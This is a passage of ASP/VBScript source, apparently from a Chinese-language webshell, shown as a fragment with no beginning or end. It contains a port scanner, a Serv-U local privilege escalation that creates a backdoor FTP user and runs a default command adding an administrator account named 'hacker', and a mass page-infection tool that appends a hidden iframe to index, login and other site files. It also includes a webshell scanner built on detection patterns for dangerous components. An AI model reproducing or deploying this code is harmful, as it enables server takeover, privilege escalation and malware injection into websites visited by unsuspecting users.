startn = left(tmp(i), seekx - 1 )
endn = right(tmp(i), len(tmp(i)) - seekx )
if isnumeric(startn) and isnumeric(endn) then
for j = startn to endn
call scan(ipstart & xxx,j)
next
else
rrs(startn & " or " & endn & " is not number<br>")
end if
else
rrs(tmp(i) & " is not number<br>")
end if
end if
next
next
end if
next
timer2 = timer
thetime=cstr(int(timer2-timer1))
rrs"<hr>process in "&thetime&" s"
end if
end sub
sub scan(targetip, portnum)
on error resume next
set conn = server.createobject("adodb.connection")
connstr="provider=sqloledb.1;data source=" & targetip &","&
portnum &";user id=lake2;password=;"
conn.connectiontimeout = 1
conn.open connstr
if err then
if err.number = -2147217843 or err.number = -2147467259
then
if instr(err.description, "(connect()).") > 0
then
rrs(targetip & ":" & portnum &
".........关闭<br>")
else
rrs(targetip & ":" & portnum &
".........<font color=red>开放</font><br>")
end if
end if
end if
end sub
select case action
case "mainmenu":mainmenu()
case "getterminalinfo":getterminalinfo()
case "scanport":scanport()
case "servu"
suaction=request("suaction")
if not isnumeric(suaction) then response.end
user = trim(request("u"))
pass = trim(request("p"))
port = trim(request("port"))
cmd = trim(request("c"))
f=trim(request("f"))
if f="" then
f=gpath()
else
f=left(f,2)
end if
ftpport = 65500
timeout=3
loginuser = "user " & user & vbcrlf
loginpass = "pass " & pass & vbcrlf
deldomain = "-deletedomain" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "
portno=" & ftpport & vbcrlf
mt = "site maintenance" & vbcrlf
newdomain = "-setdomain" & vbcrlf & "-domain=goldsun|0.0.0.0|" &
ftpport & "|-1|1|0" & vbcrlf & "-tzoenable=0" & vbcrlf & " tzokey=" &
vbcrlf
newuser = "-setusersetup" & vbcrlf & "-ip=0.0.0.0" & vbcrlf & "-
portno=" & ftpport & vbcrlf & "-user=go" & vbcrlf & "-password=od" &
vbcrlf & _
"-homedir=c:\\" & vbcrlf & "-loginmesfile=" & vbcrlf & "-
disable=0" & vbcrlf & "-relpaths=1" & vbcrlf & _
"-needsecure=0" & vbcrlf & "-hidehidden=0" & vbcrlf & "-
alwaysallowlogin=0" & vbcrlf & "-changepassword=0" & vbcrlf & _
"-quotaenable=0" & vbcrlf & "-maxusersloginperip=-1" & vbcrlf &
"-speedlimitup=0" & vbcrlf & "-speedlimitdown=0" & vbcrlf & _
"-maxnrusers=-1" & vbcrlf & "-idletimeout=600" & vbcrlf & "-
sessiontimeout=-1" & vbcrlf & "-expire=0" & vbcrlf & "-ratioup=1" &
vbcrlf & _
"-ratiodown=1" & vbcrlf & "-ratioscredit=0" & vbcrlf & "-
quotacurrent=0" & vbcrlf & "-quotamaximum=0" & vbcrlf & _
"-maintenance=system" & vbcrlf & "-passwordtype=regular" &
vbcrlf & "-ratios=none" & vbcrlf & " access=c:\\|rwamelcdp" & vbcrlf
quit = "quit" & vbcrlf
newuser=replace(newuser,"c:",f)
select case suaction
case 1
set a=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s1",true,
"", ""
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser &
quit
set session("a")=a
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='2'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在连接 127.0.0.1:"&port&",使用用户名:
"&user&",口令:"&pass&"...<center>');"
rrs"settimeout('document.all.goldsun.submit();',4000);"
rrs"</script>"
case 2
set b=server.createobject("microsoft.xmlhttp")
b.open "get", "http://127.0.0.1:" & ftpport & "/goldsun/upadmin/s2",
true, "", ""
b.send "user go" & vbcrlf & "pass od" & vbcrlf & "site exec " & cmd &
vbcrlf & quit
set session("b")=b
rrs"<form method='post' name='goldsun'>"
rrs"<input name='u' type='hidden' id='u' value='"&user&"'></td>"
rrs"<input name='p' type='hidden' id='p' value='"&pass&"'></td>"
rrs"<input name='port' type='hidden' id='port' value='"&port&"'></td>"
rrs"<input name='c' type='hidden' id='c' value='"&cmd&"' size='50'>"
rrs"<input name='f' type='hidden' id='f' value='"&f&"' size='50'>"
rrs"<input name='suaction' type='hidden' id='suaction'
value='3'></form>"
rrs"<script language='javascript'>"
rrs"document.write('<center>正在提升权限,请等待…………<center>');"
rrs"settimeout(""document.all.goldsun.submit();"",4000);"
rrs"</script>"
case 3
set c=server.createobject("microsoft.xmlhttp")
a.open "get", "http://127.0.0.1:" & port & "/goldsun/upadmin/s3", true,
"", ""
a.send loginuser & loginpass & mt & deldomain & quit
set session("a")=a
rrs"<center>提权完毕,已执行了命令:<br><font
color=red>"&cmd&"</font><br><br>"
rrs"<input type=button value=' 返回继续 ' onclick=""location.href='?
action=servu';"">"
rrs"</center>"
case else
on error resume next
set a=session("a")
set b=session("b")
set c=session("c")
a.abort
set a = nothing
b.abort
set b = nothing
c.abort
set c = nothing
rrs"<center><form method='post' name='goldsun'>"
rrs"<table width='494' height='163' border='1' cellpadding='0'
cellspacing='1' bordercolor='#666666'>"
rrs"<tr align='center' valign='middle'>"
rrs"<td colspan='2'>serv-u 提升权限 漫步云端修改版</td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td width='100'>用户名:</td>"
rrs"<td width='379'><input name='u' type='text' id='u'
value='localadministrator'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>口 令:</td>"
rrs"<td><input name='p' type='text' id='p'
value='#l@$ak#.lk;0@p'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>端 口:</td>"
rrs"<td><input name='port' type='text' id='port' value='43958'></td>"
rrs"</tr>"
rrs"<tr align='center' valign='middle'>"
rrs"<td>系统路径:</td>"
rrs" <td><input name='f' type='text' id='f' value='"&f&"'
size='8'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td>命 令:</td>"
rrs" <td><input name='c' type='text' id='c' value='cmd /c net user
hacker 123456 /add & net localgroup administrators hacker /add'
size='50'></td>"
rrs" </tr>"
rrs" <tr align='center' valign='middle'>"
rrs" <td colspan='2'><input type='submit' name='submit' value='提
交'> "
rrs"<input type='reset' name='submit2' value='重置'>"
rrs"<input name='suaction' type='hidden' id='action' value='1'></td>"
rrs"</tr></table></form></center>"
end select
function gpath()
on error resume next
err.clear
set f=server.createobject("scripting.filesystemobject")
if err.number>0 then
gpath="c:"
exit function
end if
gpath=f.getspecialfolder(0)
gpath=lcase(left(gpath,2))
set f=nothing
end function
case "kmuma"
dim report
if request.querystring("act")<>"scan" then
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form action=""?action=kmuma&act=scan""
method=""post"" name=""form1"">"
rrs "<p><b>填入你要检查的路径:</b>"
rrs "<input name=""path"" type=""text""
style=""border:1px solid #999"" value=""\"" size=""30"" /> 填“\”网站
根目录;“.”为本程序目录<br><br>"
rrs "你要干什么: <input class=c name=""radiobutton""
type=""radio"" value=""sws"" onclick=""document.getelementbyid
('showfile1').style.display='none'"" checked>查asp 马"
rrs "<input class=c type=""radio"" name=""radiobutton""
value=""sf"" onclick=""document.getelementbyid
('showfile1').style.display=''"">搜索符合条件之文件<br>"
rrs "<br /><div id=""showfile1""
style=""display:none"">"
rrs " 查找内容:<input
name=""search_content"" type=""text"" id=""search_content""
style=""border:1px solid #999"" size=""20"">"
rrs " 要查找的字符串,不填就只进行日期检查<br />"
rrs " 修改日期:<input name=""search_date""
type=""text"" style=""border:1px solid #999"" value="""&left(now
(),instr(now()," ")-1)&""" size=""20""> 多个日期用;隔开,任意日期填写
<a href=""#""
onclick=""javascript:form1.search_date.value='all'"">all</a><br />"
rrs " 文件类型:<input
name=""search_fileext"" type=""text"" style=""border:1px solid #999""
value=""*"" size=""20""> 类型之间用,隔开,*表示所有类型<br /><br
/></div>"
rrs "<input type=""submit"" value="" 开始扫描 ""
style=""background:#ccc;border:2px solid #fff;padding:2px 2px 0px
2px;margin:4px;"" />"
rrs "</form>"
else
if request.form("path")="" then
rrs("路径不能为空")
response.end()
end if
if request.form("path")="\" then
tmppath = server.mappath("\")
elseif request.form("path")="." then
tmppath = server.mappath(".")
else
tmppath = request.form("path")
end if
timer1 = timer
sun = 0
sumfiles = 0
sumfolders = 1
if request.form("radiobutton") = "sws" then
dimfileext = "asp,cer,asa,cdx"
call showallfile(tmppath)
else
if request.form("path") = "" or request.form
("search_date") = "" or request.form("search_fileext") = "" then
rrs("缉捕条件不完全<br><br><a
href='javascript:history.go(-1);'>请返回重新输入</a>")
response.end()
end if
dimfileext = request.form("search_fileext")
call showallfile2(tmppath)
end if
rrs "<table width=""100%"" border=""0"" cellpadding=""0""
cellspacing=""0"" style='font-size:12px'>"
rrs "<tr><th>scan webshell -- 漫步云端修改版</tr>"
rrs "<tr><td style=""padding:5px;line-height:170%;clear:both;font-
size:12px"">"
rrs "<div id=""updateinfo"" style=""background:ffffe1;border:1px solid
#89441f;padding:4px;display:none""></div>"
rrs "扫描完毕!一共检查文件夹<font
color=""#ff0000"">"&sumfolders&"</font>个,文件<font
color=""#ff0000"">"&sumfiles&"</font>个,发现可疑点<font
color=""#ff0000"">"&sun&"</font>个"
rrs "<table width=""100%"" border=""1"" cellpadding=""0""
cellspacing=""8"" bordercolor=""#999999"" style=""font-
size:12px;border-collapse:collapse;line-height:130%;clear:both;""><tr>"
if request.form("radiobutton") = "sws" then
rrs "<td width=""20%"">文件相对路径</td>"
rrs "<td width=""20%"">特征码</td>"
rrs "<td width=""40%"">描述</td>"
rrs "<td width=""20%"">创建/修改时间</td>"
else
rrs "<td width=""50%"">文件相对路径</td>"
rrs "<td width=""25%"">文件创建时间</td>"
rrs "<td width=""25%"">修改时间</td>"
end if
rrs "</tr>"
rrs report
rrs "<br/></table>"
timer2 = timer
thetime=cstr(int(((timer2-timer1)*10000 )+0.5)/10)
rrs "<br><font style='font-size:12px'>本页执行共用了"&thetime&"毫秒
</font>"
end if
sub showallfile(path)
set f1so = createobject("scripting.filesystemobject")
if not f1so.folderexists(path) then exit sub
set f = f1so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f1so.getextensionname
(path&"\"&myfile.name)) then
call scanfile(path&temp&"\"&myfile.name, "")
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f1so = nothing
end sub
sub scanfile(filepath, infile)
server.scripttimeout=999999999
if infile <> "" then
infiles = "<font color=red>该文件被<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(infile)&""" target=_blank>"& infile & "</a>文件包含执行</font>"
end if
set fso1s = createobject("scripting.filesystemobject")
on error resume next
set ofile = fso1s.opentextfile(filepath)
filetxt = lcase(ofile.readall())
if err then exit sub end if
if len(filetxt)>0 then
filetxt = vbcrlf & filetxt
temp = "<a href=""http://"&request.servervariables
("server_name")&"/"&turlencode(replace(replace(filepath,server.mappath
("\")&"\","",1,1,1),"\","/"))&""" target=_blank>"&replace
(filepath,server.mappath("\")&"\","",1,1,1)&"</a><br />"
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
if instr( filetxt, lcase
("wscr"&domybest&"ipt.shell") ) or instr( filetxt, lcase
("clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8") ) then
report =
report&"<tr><td>"&temp&"</td><td>wscr"&domybest&"ipt.shell 或者
clsid:72c24dd5-d70a"&domybest&"-438b-8a42-98424b88afb8</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
if instr( filetxt, lcase
("she"&domybest&"ll.application") ) or instr( filetxt, lcase
("clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000") ) then
report =
report&"<tr><td>"&temp&"</td><td>she"&domybest&"ll.application 或者
clsid:13709620-c27"&domybest&"9-11ce-a49e-444553540000</td><td><font
color=red>危险组件,一般被asp木马利用
</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "\blanguage\s*=\s*[""]?\s*
(vbscript|jscript|javascript).encode\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>
(vbscript|jscript|javascript).encode</td><td><font color=red>似乎脚本被
加密了</font>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\bev"&"al\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>ev"&"al</td><td>e"&"val()函数可以执行
任意asp代码<br>但是javascript代码中也可以使用,有可能是误
报。"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "[^.]\bexe"&"cute\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>exec"&"ute</td><td><font
color=red>e"&"xecute()函数可以执行任意asp代码
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.(open|create)textfile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.createtextfile|.opentextfile</td><td>
使用了fso的createtextfile|opentextfile读写文
件"&infiles&"</td><td>"&getdatecreate(filepath)&"<br>"&getdatemodify
(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.savetofile\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.savetofile</td><td>使用了stream的
savetofile函数写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
regex.pattern = "\.save\b"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>.save</td><td>使用了xmlhttp的save函数
写文件"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
temp="-=| 同上 |=-"
end if
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--\s*#include\s*file\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "<!--
\s*#include\s*virtual\s*=\s*"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( server.mappath("\")
&"\"&tfile, replace(filepath,server.mappath("\")&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()"".*"""
set matches = regex.execute(filetxt)
for each match in matches
tfile = replace(mid(match.value, instr
(match.value, """") + 1, len(match.value) - instr(match.value, """") -
1),"/","\")
if not checkext(fso1s.getextensionname(tfile))
then
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tfile, replace(filepath,server.mappath("\")
&"\","",1,1,1) )
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "server.(exec"&"ute|transfer)([ \t]
*|\()[^""]\)"
if regex.test(filetxt) then
report =
report&"<tr><td>"&temp&"</td><td>server.exec"&"ute</td><td><font
color=red>不能跟踪检查server.e"&"xecute()函数执行的文件。
</font><br>"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
end if
set matches = nothing
set regex = nothing
set xregex = new regexp
xregex.ignorecase = true
xregex.global = true
xregex.pattern = "<scr"&"ipt\s*(.|\n)*?runat\s*=\s*""?
server""?(.|\n)*?>"
set xmatches = xregex.execute(filetxt)
for each match in xmatches
tmplake2 = mid(match.value, 1, instr
(match.value, ">"))
srcseek = instr(1, tmplake2, "src", 1)
if srcseek > 0 then
srcseek2 = instr(srcseek, tmplake2,
"=")
for i = 1 to 50
tmp = mid(tmplake2, srcseek2 +
i, 1)
if tmp <> " " and tmp <> chr(9)
and tmp <> vbcrlf then
exit for
end if
next
if tmp = """" then
tmpname = mid(tmplake2,
srcseek2 + i + 1, instr(srcseek2 + i + 1, tmplake2, """") - srcseek2 -
i - 1)
else
if instr(srcseek2 + i + 1,
tmplake2, " ") > 0 then tmpname = mid(tmplake2, srcseek2 + i, instr
(srcseek2 + i + 1, tmplake2, " ") - srcseek2 - i) else tmpname =
tmplake2
if instr(tmpname, chr(9)) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, chr(9)) - 1)
if instr(tmpname, vbcrlf) > 0
then tmpname = mid(tmpname, 1, instr(1, tmpname, vbcrlf) - 1)
if instr(tmpname, ">") > 0 then
tmpname = mid(tmpname, 1, instr(1, tmpname, ">") - 1)
end if
call scanfile( mid(filepath,1,instrrev
(filepath,"\"))&tmpname , replace(filepath,server.mappath("\")
&"\","",1,1,1))
sumfiles = sumfiles + 1
end if
next
set matches = nothing
set regex = nothing
set regex = new regexp
regex.ignorecase = true
regex.global = true
regex.pattern = "createo"&"bject[ |\t]*\(.*\)"
set matches = regex.execute(filetxt)
for each match in matches
if instr(match.value, "&") or instr
(match.value, "+") or instr(match.value, """") = 0 or instr
(match.value, "(") <> instrrev(match.value, "(") then
report =
report&"<tr><td>"&temp&"</td><td>creat"&"eobject</td><td>crea"&"teobjec
t函数使用了变形技术"&infiles&"</td><td>"&getdatecreate(filepath)
&"<br>"&getdatemodify(filepath)&"</td></tr>"
sun = sun + 1
exit sub
end if
next
set matches = nothing
set regex = nothing
end if
set ofile = nothing
set fso1s = nothing
end sub
function checkext(fileext)
if dimfileext = "*" then checkext = true
ext = split(dimfileext,",")
for i = 0 to ubound(ext)
if lcase(fileext) = ext(i) then
checkext = true
exit function
end if
next
end function
function getdatemodify(filepath)
set f2so = createobject("scripting.filesystemobject")
set f = f2so.getfile(filepath)
s = f.datelastmodified
set f = nothing
set f2so = nothing
getdatemodify = s
end function
function getdatecreate(filepath)
set f3so = createobject("scripting.filesystemobject")
set f = f3so.getfile(filepath)
s = f.datecreated
set f = nothing
set f3so = nothing
getdatecreate = s
end function
function turlencode(str)
temp = replace(str, "%", "%25")
temp = replace(temp, "#", "%23")
temp = replace(temp, "&", "%26")
turlencode = temp
end function
sub showallfile2(path)
set f4so = createobject("scripting.filesystemobject")
if not f4so.folderexists(path) then exit sub
set f = f4so.getfolder(path)
set fc2 = f.files
for each myfile in fc2
if checkext(f4so.getextensionname
(path&"\"&myfile.name)) then
call isfind(path&"\"&myfile.name)
sumfiles = sumfiles + 1
end if
next
set fc = f.subfolders
for each f1 in fc
showallfile2 path&"\"&f1.name
sumfolders = sumfolders + 1
next
set f4so = nothing
end sub
sub isfind(thepath)
thedate = getdatemodify(thepath)
on error resume next
thetmp = mid(thedate, 1, instr(thedate, " ") - 1)
if err then exit sub
xdate = split(request.form("search_date"),";")
if request.form("search_date") = "all" then alltime = true
for i = 0 to ubound(xdate)
if thetmp = xdate(i) or alltime = true then
if request("search_content") <> "" then
set fso2s = createobject
("scripting.filesystemobject")
set ofile = fso2s.opentextfile(thepath,
1, false, -2)
filetxt = lcase(ofile.readall())
if instr( filetxt, lcase(request.form
("search_content"))) > 0 then
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(thepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a>"
temp=temp&" → <a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
report =
report&"<tr><td>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
ofile.close()
set ofile = nothing
set fso2s = nothing
else
temp = "<a
href=""http://"&request.servervariables("server_name")&"/"&turlencode
(replace(replace(filepath,server.mappath("\")&"\","",1,1,1),"\","/"))
&""" target=_blank>"&replace(thepath,server.mappath("\")&"\","",1,1,1)
&"</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")&""",""delfile"")'
onclick='return yesok()' class='am' title='删除'>删除</a > "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
temp=temp&"<a href='javascript:fullform("""&replace(replace
(filepath,server.mappath("\")&"\","",1,1,1),"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a>"
report = report&"<tr><td
height=30>"&temp&"</td><td>"&getdatecreate(thepath)
&"</td><td>"&thedate&"</td></tr>"
sun = sun + 1
exit sub
end if
end if
next
end sub
case "plgm"
server.scripttimeout=1000000
response.buffer=false
rrs ("<b>当前网站绝对路径:")&server.mappath("/")&("</b>")
asp_self=request.servervariables("path_info")
s=request("fd")
if s="" then s=server.mappath("/")
ex=request("ex")
pth=request("pth")
newcnt=request("newcnt")
addcode = request("code")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm width=0
height=0></iframe>"
if ex<>"" and pth<>"" then
select case ex
case "edit"
call file_show(pth)
case "save"
call file_save(pth)
end select
else
rrs("<form method=""post""> ")
rrs("<table width=560 border=""0"" style=""font-size:12px;"">")
rrs("<tr>")
rrs("<td width=""102"">要挂马文件夹的绝对路径:</td>")
rrs("<td width=""359""><input type=""text"" name=""fd"" value="""&s&"""
size=60></td>")
rrs("<td width=""69""> </td>")
rrs("</tr><tr><td>要挂马的代码:</td>")
rrs("<td><textarea name=""code"" cols=58
rows=""3"">"&addcode&"</textarea></td>")
rrs("<td><input name=""submit"" type=""submit"" value=""开始""></td>")
rrs("</tr></table></form> ")
end if
function ispattern(patt,str)
set regex=new regexp
regex.pattern=patt
regex.ignorecase=true
retval=regex.test(str)
set regex=nothing
if retval=true then
ispattern=true
else
ispattern=false
end if
end function
if request.form("submit")<>"" then
if s="" or addcode="" then
rrs "<font color=red>请输入挂马的路径或代码!</font>"
response.end
else if ispattern("[^ab]{1}:{1}(\\|\/)",s) then sch s
end if
end if
sub sch(s)
on error resume next
set fs=server.createobject("scripting.filesystemobject")
set fd=fs.getfolder(s)
set fi=fd.files
set sf=fd.subfolders
for each f in fi
rtn=f.path
step_all rtn
next
if sf.count<>0 then
for each l in sf
sch l
next
end if
end sub
sub step_all(agr)
retval=ispattern("(\\|\/)
(default|index|conn|admin|bbs|reg|help|upfile|upload|cart|class|login|d
iy|no|ok|del|config|sql|user|ubb|ftp|asp|top|new|open|name|email|img|im
ages|web|blog|save|data|add|edit|game|about|manager|book|bt|config|mp3|
vod|error|copy|move|down|system|logo|qq|520|newup|myup|play|show|view|i
p|err404|send|foot|char|info|list|shop|err|nc|ad|flash|text|admin_upfil
e|admin_upload|upfile_load|upfile_soft|upfile_photo|upfile_softpic|vip|
505)\.(htm|html|asp|php|jsp|aspx|cgi|js)\b",agr)
if retval then
step1 agr
step2 agr
else
exit sub
end if
end sub
sub step1(str1)
rrs "<div style='line-height:20px'>√ "&str1&" _"
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""downfile"")' class='am' title='下载'>下载</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""editfile"")' class='am' title='编辑'>编辑</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""delfile"")'onclick='return yesok()' class='am' title='删除'>删除
</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""copyfile"")' class='am' title='复制'>复制</a> "
rrs "<a href='javascript:fullform("""&replace(str1,"\","\\")
&""",""movefile"")' class='am' title='移动'>移动</a></div>"
end sub
sub step2(str2)
set fs=server.createobject("scripting.filesystemobject")
isexist=fs.fileexists(str2)
if isexist then
set f=fs.getfile(str2)
set f_addcode=f.openastextstream(8,-2)
if left(right(str2,8),4)="conn" then
f_addcode.write
else
f_addcode.write addcode
f_addcode.close
set f=nothing
end if
end if
set fs=nothing
end sub
err.clear
case "cplgm"
fpath=request("fd")
addcode = request("code")
addcode2 = request("code2")
pcfile=request("pcfile")
checkbox=request("checkbox")
showmsg=request("showmsg")
ftype=request("ftype")
m=request("m")
if ftype="" then
ftype="txt|htm|html|asp|php|jsp|aspx|cgi|cer|asa|cdx"
if fpath="\" then fpath=server.mappath("\")
if fpath="." or fpath="" then fpath=server.mappath("/")
if addcode="" then addcode="<iframe src=http://127.0.0.1/m.htm
width=0 height=0></iframe>"
if checkbox="" then checkbox=request("checkbox")
if pcfile="" then
pcfilename=request.servervariables("script_name")
pcfilek=split(pcfilename,"/")
pcfilen=ubound(pcfilek)
pcfile=pcfilek(pcfilen)
end if
rrs ("<b>网站根目录</b>- "&server.mappath("/")&"<br>")
rrs ("<b>本程序目录</b>- "&server.mappath("."))
rrs "<form method=post><div style='color:#3399ff'><b>["
if m="1" then rrs"批量挂马器-批量挂马"
if m="2" then rrs"批量清马器-清除别人的网马"
if m="3" then rrs"批量替换器-文件替换修改工具"
if m="" then response.end
rrs "]</b></div><table width=100% border=0><tr><td>文件路径:
</td>"
rrs "<td><input type=text name=fd value=""\"" size=40> 填“\”
即网站根目录;“.”为程序所在目录</td></tr>"
if m="1" then rrs "<tr><td>过滤重复:</td><td><input class=c
name='checkbox' checked='checked' type=checkbox value=""checked""
"&checkbox&"> 防止一个页面中有多个重复的代码</td></tr>"
rrs "<tr><td>排除文件:</td>"
rrs "<td><input name='pcfile' type=text id='pcfile'
value='"&pcfile&"' size=40> 输入不想被修改的文件名,例如:
1.asp|2.asp|3.asp</td></tr>"
rrs "<tr><td>文件类型:</td>"
rrs "<td><input name='ftype' type=text id='ftype'
value='"&ftype&"' size=40> 输入要修改的文件类型[扩展名],例如:
htm|html|asp|php|jsp|aspx|cgi</td></tr><tr><td><font color=#3399ff>"
if m="1" then rrs"要挂的马:"
if m="2" then rrs"要清的马:"
if m="3" then rrs"查找内容:"
rrs"</font></td><td><textarea name=code cols=66
rows=3>"&addcode&"</textarea></td></tr>"
if m="3" then rrs "<tr><td><font color=#3399ff>替 换 为:
</font></td><td><textarea name=code2 cols=66
rows=3>"&addcode&"</textarea></td></tr>"
rrs "<tr><td></td><td> <input name=submit type=submit value=开
始执行> --标记解释--[成功:√ , 排除:× , 重复:<font color=red>×
</font>]</td></tr>"
rrs "</table></form>"
if request("submit")="开始执行" then
rrs"<div style='line-height:25px'><b>执行记录:</b><br>"
call insertallfiles(fpath,addcode,pcfile)
rrs"</div>"
end if
sub insertallfiles(wpath,wcode,pc)
server.scripttimeout=999999999
if right(wpath,1)<>"\" then wpath=wpath &"\"
set wfso = createobject("scripting.filesystemobject")
on error resume next
set f = wfso.getfolder(wpath)
set fc2 = f.files
for each myfile in fc2
set fs1 = createobject("scripting.filesystemobject")
ftype1=split(myfile.name,".")
ftype2=ubound(ftype1)
if ftype2>0 then
ftype3=lcase(ftype1(ftype2))
else
ftype3="无"
end if
if instr(lcase(pc),lcase(myfile.name))=0 and instr
